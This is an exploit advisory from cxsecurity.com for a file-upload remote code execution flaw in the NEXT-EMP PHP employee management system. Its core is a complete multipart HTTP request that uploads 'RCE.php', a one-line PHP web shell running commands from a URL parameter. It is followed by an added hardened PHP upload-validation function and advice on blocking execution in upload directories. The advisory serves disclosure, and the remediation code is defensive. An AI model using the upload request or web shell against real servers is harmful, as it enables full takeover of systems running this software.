NEXT-EMP v1.0-Copyright © 2024. All rights reserved. File Upload-FU and Remote Code Execution-RCE
2025-1-29 22:11:37 Author: cxsecurity.com Views: 5

# Titles: NEXT-EMP v1.0-Copyright © 2024. All rights reserved.
### File Upload-FU and Remote Code Execution-RCE Vulnerabilities
# Author: nu11secur1ty
# Date: 01/29/2025
# Vendor: https://www.mayurik.com/
# Software: https://www.mayurik.com/source-code/P8337/complete-employee-management-system-project-in-php-free-download
# Reference: https://portswigger.net/web-security/file-upload | https://portswigger.net/web-security/file-upload/lab-file-upload-remote-code-execution-via-web-shell-upload

## Description:
The website_image parameter in the profile app is vulnerable to File Upload and then Remote Code Execution, without any sanitizing of execution permissions. The attacker can upload absolutely DANGEROUS files on that server and he can destroy it with one click!

STATUS: HIGH-CRITICAL Vulnerability

[+]Exploit:

- RCE Exploit:

```http
POST /pwnedhost/_hr_soft/admin/profile.php HTTP/1.1
Host: 192.168.100.45
Cookie: PHPSESSID=slraqmcub88jc9mdbc968fop7l
Content-Length: 1325
Cache-Control: max-age=0
Sec-Ch-Ua: "Not A(Brand";v="8", "Chromium";v="132"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Windows"
Accept-Language: en-US,en;q=0.9
Origin: https://192.168.100.45
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryHzTVdFgDMQYGBepP
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://192.168.100.45/pwnedhost/_hr_soft/admin/profile.php
Accept-Encoding: gzip, deflate, br
Priority: u=0, i
Connection: keep-alive

------WebKitFormBoundaryHzTVdFgDMQYGBepP
Content-Disposition: form-data; name="old_website_image"

stupid.png
------WebKitFormBoundaryHzTVdFgDMQYGBepP
Content-Disposition: form-data; name="website_image"; filename="RCE.php"
Content-Type: application/octet-stream

<?php echo shell_exec($_GET["cmd"]); ?>
------WebKitFormBoundaryHzTVdFgDMQYGBepP
Content-Disposition: form-data; name="fname"

Mayuri
------WebKitFormBoundaryHzTVdFgDMQYGBepP
Content-Disposition: form-data; name="lname"

K
------WebKitFormBoundaryHzTVdFgDMQYGBepP
Content-Disposition: form-data; name="email"

[email protected]
------WebKitFormBoundaryHzTVdFgDMQYGBepP
Content-Disposition: form-data; name="gender"

Male
------WebKitFormBoundaryHzTVdFgDMQYGBepP
Content-Disposition: form-data; name="contact"

9529230459
------WebKitFormBoundaryHzTVdFgDMQYGBepP
Content-Disposition: form-data; name="username"

mayurik
------WebKitFormBoundaryHzTVdFgDMQYGBepP
Content-Disposition: form-data; name="address"

India
------WebKitFormBoundaryHzTVdFgDMQYGBepP
Content-Disposition: form-data; name="update"


------WebKitFormBoundaryHzTVdFgDMQYGBepP--
```

# Reproduce:
[href](https://www.patreon.com/posts/nextemployee-1-0-121020861)
[more](https://www.nu11secur1ty.com/2025/01/nextemployee-10-rce.html)

## Time spent:
00:37:00

--
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstormsecurity.com/ https://cve.mitre.org/index.html https://cxsecurity.com/ and https://www.exploit-db.com/
0day Exploit DataBase https://0day.today/
home page: https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
nu11secur1ty <http://nu11secur1ty.com/>
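As an added example (not code from NEXT-EMP or from the advisory's author), this is a hardened PHP replacement for the profile-image upload step the advisory describes: an extension allowlist checked on every dot-separated segment, server-side content sniffing instead of trusting the request's Content-Type, and a random server-side filename. The function name, the `$uploadDir` argument and the `uploads` path are assumptions; `website_image` is the form field named in the advisory.

```php
<?php
// Added example, not NEXT-EMP's own code. Assumed: function name, $uploadDir.

function validate_image_upload(array $file, string $uploadDir): array
{
    // Allowlist: accepted extension => MIME type the file bytes must really have.
    $allowed = ['png' => 'image/png', 'jpg' => 'image/jpeg',
                'jpeg' => 'image/jpeg', 'gif' => 'image/gif'];

    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK
        || empty($file['tmp_name']) || !is_uploaded_file($file['tmp_name'])) {
        return ['ok' => false, 'reason' => 'no valid upload'];
    }
    if (($file['size'] ?? 0) > 2 * 1024 * 1024) {
        return ['ok' => false, 'reason' => 'file too large'];
    }

    // The client-supplied name only selects the allowlist entry. Every segment
    // after the base name must itself be an allowed extension, so "RCE.php"
    // and "RCE.php.png" are both rejected.
    $parts = explode('.', strtolower(basename($file['name'] ?? '')));
    if (count($parts) < 2) {
        return ['ok' => false, 'reason' => 'missing extension'];
    }
    $ext = array_pop($parts);
    array_shift($parts);
    if (!isset($allowed[$ext]) || array_diff($parts, array_keys($allowed))) {
        return ['ok' => false, 'reason' => 'extension not allowed'];
    }

    // Sniff the real content type server-side; the Content-Type in the request
    // (application/octet-stream in the advisory) is attacker-controlled.
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($file['tmp_name']);
    if ($mime !== $allowed[$ext] || getimagesize($file['tmp_name']) === false) {
        return ['ok' => false, 'reason' => "content is not a $ext image"];
    }

    // Never reuse the client name: random server-side name with the vetted
    // extension, stored without an execute bit.
    $name = bin2hex(random_bytes(16)) . '.' . $ext;
    $dest = rtrim($uploadDir, '/') . '/' . $name;
    if (!move_uploaded_file($file['tmp_name'], $dest)) {
        return ['ok' => false, 'reason' => 'could not store file'];
    }
    chmod($dest, 0644);
    return ['ok' => true, 'name' => $name];
}

// In profile.php this replaces the unchecked save of $_FILES['website_image']:
// $result = validate_image_upload($_FILES['website_image'], __DIR__ . '/../uploads');
// if (!$result['ok']) { http_response_code(400); exit($result['reason']); }
```

Validation alone is not the whole fix: the upload directory must also be one from which the web server never executes PHP (engine disabled for that location, or the directory kept outside the document root and served through a read-only script), so that a bypassed check cannot turn into code execution.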
Copyright 2025, cxsecurity.com

Source: https://cxsecurity.com/issue/WLB-2025010032